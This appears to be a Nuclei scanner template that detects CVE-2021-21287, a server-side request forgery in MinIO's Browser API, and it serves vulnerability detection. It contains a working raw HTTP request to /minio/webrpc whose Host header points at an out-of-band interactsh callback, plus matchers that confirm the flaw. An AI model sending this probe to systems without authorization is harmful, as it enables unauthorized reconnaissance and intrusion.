id: CVE-2021-21287 info: name: MinIO Browser API - Server-Side Request Forgery author: pikpikcu severity: high description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability. reference: - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html - https://github.com/minio/minio/pull/11337 - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2021-21287 cwe-id: CWE-918 tags: cve,cve2021,minio,ssrf,oast requests: - raw: - | POST /minio/webrpc HTTP/1.1 Host: {{interactsh-url}} Content-Type: application/json User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 Content-Length: 76 {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" # Confirms the HTTP Interaction - type: word words: - "We encountered an internal error" # Enhanced by mp on 2022/06/27